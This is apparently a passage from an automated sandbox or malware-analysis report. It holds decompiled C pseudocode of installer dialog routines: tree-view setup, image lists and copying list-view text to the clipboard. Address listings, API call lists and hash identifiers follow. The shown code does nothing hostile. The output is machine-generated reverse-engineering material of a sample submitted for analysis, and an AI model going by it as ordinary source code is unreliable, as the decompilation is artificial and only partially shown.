										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x42a07c;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42a094;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x42a07c = _t315;
									 *0x42a094 = _t315;
									 *0x42ec80 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x42ec39 & 0x00000001;
										if(( *0x42ec39 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x42ec4c - _t315; // 0x2
										_v32 =  *0x42a094;
										_t196 =  *0x42ec48; // 0x51397c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42e3fc; // 0x51901c
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040473D(0x3ff, 0xfffffffb, E00404755(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x513984
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x513994
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x42ec4c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42a094);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x42ec80 = _a4;
					_t247 =  *0x42ec4c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x42ec4c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x42ec4c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                            0x00404820
                                                                                            0x00404826
                                                                                            0x00404828
                                                                                            0x0040482e
                                                                                            0x00404834
                                                                                            0x00404837
                                                                                            0x00404841
                                                                                            0x0040484a
                                                                                            0x0040484d
                                                                                            0x00404850
                                                                                            0x00404a78
                                                                                            0x00404a78
                                                                                            0x00404a7f
                                                                                            0x00404a93
                                                                                            0x00404a81
                                                                                            0x00404a83
                                                                                            0x00404a86
                                                                                            0x00404a87
                                                                                            0x00404a8e
                                                                                            0x00404a8e
                                                                                            0x00404a96
                                                                                            0x00404a9f
                                                                                            0x00404aaa
                                                                                            0x00404aaa
                                                                                            0x00404aad
                                                                                            0x00404ab0
                                                                                            0x00404abf
                                                                                            0x00404abf
                                                                                            0x00404ac6
                                                                                            0x00404b3e
                                                                                            0x00404b3e
                                                                                            0x00404b41
                                                                                            0x00404b43
                                                                                            0x00404b46
                                                                                            0x00404b4d
                                                                                            0x00404b5b
                                                                                            0x00404b5b
                                                                                            0x00404b5d
                                                                                            0x00404b60
                                                                                            0x00404b67
                                                                                            0x00404b69
                                                                                            0x00404b6d
                                                                                            0x00404b8a
                                                                                            0x00404b8e
                                                                                            0x00404b8e
                                                                                            0x00404b6f
                                                                                            0x00404b7c
                                                                                            0x00404b7c
                                                                                            0x00404b6d
                                                                                            0x00404b67
                                                                                            0x00000000
                                                                                            0x00404b41
                                                                                            0x00404ac8
                                                                                            0x00404acb
                                                                                            0x00404ad6
                                                                                            0x00404ad8
                                                                                            0x00404adb
                                                                                            0x00404ae2
                                                                                            0x00404ae7
                                                                                            0x00404ae9
                                                                                            0x00404af3
                                                                                            0x00404af3
                                                                                            0x00404af7
                                                                                            0x00404af9
                                                                                            0x00404afc
                                                                                            0x00404afe
                                                                                            0x00404b01
                                                                                            0x00404b17
                                                                                            0x00404b17
                                                                                            0x00404b03
                                                                                            0x00404b03
                                                                                            0x00404b09
                                                                                            0x00404b0b
                                                                                            0x00404b12
                                                                                            0x00404b0d
                                                                                            0x00404b0d
                                                                                            0x00404b0d
                                                                                            0x00404b0b
                                                                                            0x00404b1b
                                                                                            0x00404b1d
                                                                                            0x00404b22
                                                                                            0x00404b2b
                                                                                            0x00404b2c
                                                                                            0x00404b36
                                                                                            0x00404b36
                                                                                            0x00404b38
                                                                                            0x00404b3b
                                                                                            0x00404b3b
                                                                                            0x00404afc
                                                                                            0x00000000
                                                                                            0x00404ae9
                                                                                            0x00404acd
                                                                                            0x00404ad0
                                                                                            0x00404ad4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404ad4
                                                                                            0x00404ab2
                                                                                            0x00404ab9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404aa1
                                                                                            0x00404aa1
                                                                                            0x00404aa4
                                                                                            0x00404b91
                                                                                            0x00404b91
                                                                                            0x00404b98
                                                                                            0x00404c0c
                                                                                            0x00404c0c
                                                                                            0x00404c13
                                                                                            0x00404c1f
                                                                                            0x00404c1f
                                                                                            0x00404c21
                                                                                            0x00404c28
                                                                                            0x00404c2a
                                                                                            0x00404c2f
                                                                                            0x00404c31
                                                                                            0x00404c34
                                                                                            0x00404c34
                                                                                            0x00404c3a
                                                                                            0x00404c3f
                                                                                            0x00404c41
                                                                                            0x00404c44
                                                                                            0x00404c44
                                                                                            0x00404c4a
                                                                                            0x00404c50
                                                                                            0x00404c56
                                                                                            0x00404c56
                                                                                            0x00404c5c
                                                                                            0x00404c63
                                                                                            0x00404db0
                                                                                            0x00404db0
                                                                                            0x00404db7
                                                                                            0x00404db9
                                                                                            0x00404dc0
                                                                                            0x00404dc4
                                                                                            0x00404dd1
                                                                                            0x00404dd1
                                                                                            0x00404dd4
                                                                                            0x00404dda
                                                                                            0x00404dec
                                                                                            0x00404dec
                                                                                            0x00404dc0
                                                                                            0x00000000
                                                                                            0x00404c69
                                                                                            0x00404c6b
                                                                                            0x00404c70
                                                                                            0x00404c73
                                                                                            0x00404c77
                                                                                            0x00404c77
                                                                                            0x00404c7c
                                                                                            0x00404c7f
                                                                                            0x00404cc0
                                                                                            0x00404cc2
                                                                                            0x00404ccc
                                                                                            0x00404cd2
                                                                                            0x00404cd5
                                                                                            0x00404cda
                                                                                            0x00404ce1
                                                                                            0x00404ce4
                                                                                            0x00404d86
                                                                                            0x00404d8c
                                                                                            0x00404d92
                                                                                            0x00404d97
                                                                                            0x00404d9a
                                                                                            0x00404dab
                                                                                            0x00404dab
                                                                                            0x00000000
                                                                                            0x00404cea
                                                                                            0x00404cea
                                                                                            0x00404cea
                                                                                            0x00404ced
                                                                                            0x00404cf3
                                                                                            0x00404cf6
                                                                                            0x00404cf8
                                                                                            0x00404cfa
                                                                                            0x00404cfc
                                                                                            0x00404cff
                                                                                            0x00404d02
                                                                                            0x00404d09
                                                                                            0x00404d0b
                                                                                            0x00404d0e
                                                                                            0x00404d15
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d18
                                                                                            0x00404d1c
                                                                                            0x00404d1f
                                                                                            0x00404d2b
                                                                                            0x00404d2c
                                                                                            0x00404d2f
                                                                                            0x00404d31
                                                                                            0x00404d31
                                                                                            0x00404d31
                                                                                            0x00404d21
                                                                                            0x00404d23
                                                                                            0x00404d23
                                                                                            0x00404d50
                                                                                            0x00404d50
                                                                                            0x00404d51
                                                                                            0x00404d5d
                                                                                            0x00404d6c
                                                                                            0x00404d6c
                                                                                            0x00404d6e
                                                                                            0x00404d71
                                                                                            0x00404d7a
                                                                                            0x00404d7a
                                                                                            0x00000000
                                                                                            0x00404ced
                                                                                            0x00404c81
                                                                                            0x00404c8c
                                                                                            0x00404c8f
                                                                                            0x00404c94
                                                                                            0x00404c96
                                                                                            0x00404c98
                                                                                            0x00404c9a
                                                                                            0x00404caa
                                                                                            0x00404cb4
                                                                                            0x00404cb6
                                                                                            0x00404cb9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404c9c
                                                                                            0x00404c9c
                                                                                            0x00404c9c
                                                                                            0x00404c9f
                                                                                            0x00404ca2
                                                                                            0x00404ca4
                                                                                            0x00404ca4
                                                                                            0x00404ca4
                                                                                            0x00404ca5
                                                                                            0x00404ca6
                                                                                            0x00404ca6
                                                                                            0x00000000
                                                                                            0x00404c9c
                                                                                            0x00404c7f
                                                                                            0x00404c63
                                                                                            0x00404b9a
                                                                                            0x00404ba0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bac
                                                                                            0x00404bb0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bc0
                                                                                            0x00404bc2
                                                                                            0x00404bc5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404bd7
                                                                                            0x00404bd9
                                                                                            0x00404bdc
                                                                                            0x00404be6
                                                                                            0x00404be8
                                                                                            0x00404be9
                                                                                            0x00404bea
                                                                                            0x00404bf9
                                                                                            0x00404bfb
                                                                                            0x00404c02
                                                                                            0x00404c05
                                                                                            0x00000000
                                                                                            0x00404c05
                                                                                            0x00404bde
                                                                                            0x00404be1
                                                                                            0x00404be4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404be4
                                                                                            0x00000000
                                                                                            0x00404aa4
                                                                                            0x00404856
                                                                                            0x0040485b
                                                                                            0x00404860
                                                                                            0x00404865
                                                                                            0x00404866
                                                                                            0x0040486f
                                                                                            0x0040487a
                                                                                            0x00404885
                                                                                            0x0040488b
                                                                                            0x00404899
                                                                                            0x004048ae
                                                                                            0x004048b3
                                                                                            0x004048be
                                                                                            0x004048c7
                                                                                            0x004048dc
                                                                                            0x004048ed
                                                                                            0x004048fa
                                                                                            0x004048fa
                                                                                            0x004048ff
                                                                                            0x00404905
                                                                                            0x00404907
                                                                                            0x0040490a
                                                                                            0x0040490f
                                                                                            0x00404914
                                                                                            0x00404916
                                                                                            0x00404916
                                                                                            0x00404936
                                                                                            0x00404936
                                                                                            0x00404938
                                                                                            0x00404939
                                                                                            0x0040493e
                                                                                            0x00404941
                                                                                            0x00404944
                                                                                            0x00404948
                                                                                            0x0040494d
                                                                                            0x00404952
                                                                                            0x00404956
                                                                                            0x0040495b
                                                                                            0x00404960
                                                                                            0x00404962
                                                                                            0x00404964
                                                                                            0x0040496a
                                                                                            0x00404a34
                                                                                            0x00404a47
                                                                                            0x00000000
                                                                                            0x00404970
                                                                                            0x00404973
                                                                                            0x00404976
                                                                                            0x00404979
                                                                                            0x00404979
                                                                                            0x0040497f
                                                                                            0x00404985
                                                                                            0x00404988
                                                                                            0x0040498e
                                                                                            0x0040498f
                                                                                            0x00404994
                                                                                            0x0040499d
                                                                                            0x004049a4
                                                                                            0x004049a7
                                                                                            0x004049aa
                                                                                            0x004049ad
                                                                                            0x004049e7
                                                                                            0x004049e9
                                                                                            0x00404a12
                                                                                            0x004049eb
                                                                                            0x004049f8
                                                                                            0x004049f8
                                                                                            0x004049af
                                                                                            0x004049b2
                                                                                            0x004049c1
                                                                                            0x004049cb
                                                                                            0x004049d3
                                                                                            0x004049da
                                                                                            0x004049e2
                                                                                            0x004049e2
                                                                                            0x004049ad
                                                                                            0x00404a18
                                                                                            0x00404a19
                                                                                            0x00404a1f
                                                                                            0x00404a25
                                                                                            0x00404a25
                                                                                            0x00404a32
                                                                                            0x00404a4d
                                                                                            0x00404a51
                                                                                            0x00404a6e
                                                                                            0x00404a73
                                                                                            0x00404a76
                                                                                            0x00404a76
                                                                                            0x00000000
                                                                                            0x00404a53
                                                                                            0x00404a58
                                                                                            0x00404a61
                                                                                            0x00404dee
                                                                                            0x00404e00
                                                                                            0x00404e00
                                                                                            0x00404a51
                                                                                            0x00000000
                                                                                            0x00404a32
                                                                                            0x0040496a

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00404819
                                                                                            • GetDlgItem.USER32 ref: 00404826
                                                                                            • GlobalAlloc.KERNEL32(00000040,00000002), ref: 00404872
                                                                                            • LoadBitmapA.USER32 ref: 00404885
                                                                                            • SetWindowLongA.USER32(?,000000FC,00404E03), ref: 0040489F
                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004048B3
                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 004048C7
                                                                                            • SendMessageA.USER32(?,00001109,00000002), ref: 004048DC
                                                                                            • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004048E8
                                                                                            • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004048FA
                                                                                            • DeleteObject.GDI32(?), ref: 004048FF
                                                                                            • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040492A
                                                                                            • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404936
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 004049CB
                                                                                            • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 004049F6
                                                                                            • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A0A
                                                                                            • GetWindowLongA.USER32 ref: 00404A39
                                                                                            • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A47
                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404A58
                                                                                            • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404B5B
                                                                                            • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404BC0
                                                                                            • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404BD5
                                                                                            • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404BF9
                                                                                            • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C1F
                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404C34
                                                                                            • GlobalFree.KERNEL32 ref: 00404C44
                                                                                            • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404CB4
                                                                                            • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404D5D
                                                                                            • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404D6C
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D8C
                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404DDA
                                                                                            • GetDlgItem.USER32 ref: 00404DE5
                                                                                            • ShowWindow.USER32(00000000), ref: 00404DEC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                            • String ID: $M$N$|9Q
                                                                                            • API String ID: 1638840714-666176149
                                                                                            • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                            • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                                                                            • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                                                                            • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 96%
                                                                                            			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x5137d0
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                            0x00404ffa
                                                                                            0x00405000
                                                                                            0x00405009
                                                                                            0x0040500c
                                                                                            0x0040519d
                                                                                            0x004051a4
                                                                                            0x004051c8
                                                                                            0x004051c8
                                                                                            0x004051ce
                                                                                            0x004051db
                                                                                            0x004051f9
                                                                                            0x004051f9
                                                                                            0x00405200
                                                                                            0x00405257
                                                                                            0x00405257
                                                                                            0x0040525b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040525d
                                                                                            0x00405260
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040526a
                                                                                            0x00405270
                                                                                            0x00405272
                                                                                            0x00405275
                                                                                            0x0040536e
                                                                                            0x00000000
                                                                                            0x0040536e
                                                                                            0x00405284
                                                                                            0x00405290
                                                                                            0x00405296
                                                                                            0x00405299
                                                                                            0x0040529c
                                                                                            0x004052b1
                                                                                            0x004052b4
                                                                                            0x004052b4
                                                                                            0x004052b7
                                                                                            0x0040529e
                                                                                            0x004052a3
                                                                                            0x004052a9
                                                                                            0x004052ac
                                                                                            0x004052ac
                                                                                            0x004052c7
                                                                                            0x004052cf
                                                                                            0x004052d0
                                                                                            0x004052d2
                                                                                            0x004052db
                                                                                            0x004052de
                                                                                            0x004052e5
                                                                                            0x004052ec
                                                                                            0x004052f4
                                                                                            0x004052f4
                                                                                            0x00405302
                                                                                            0x00405308
                                                                                            0x0040530b
                                                                                            0x0040530b
                                                                                            0x00405312
                                                                                            0x00405318
                                                                                            0x00405321
                                                                                            0x00405328
                                                                                            0x00405331
                                                                                            0x00405333
                                                                                            0x00405336
                                                                                            0x00405345
                                                                                            0x00405347
                                                                                            0x0040534d
                                                                                            0x0040534e
                                                                                            0x0040534f
                                                                                            0x0040534f
                                                                                            0x00405357
                                                                                            0x00405362
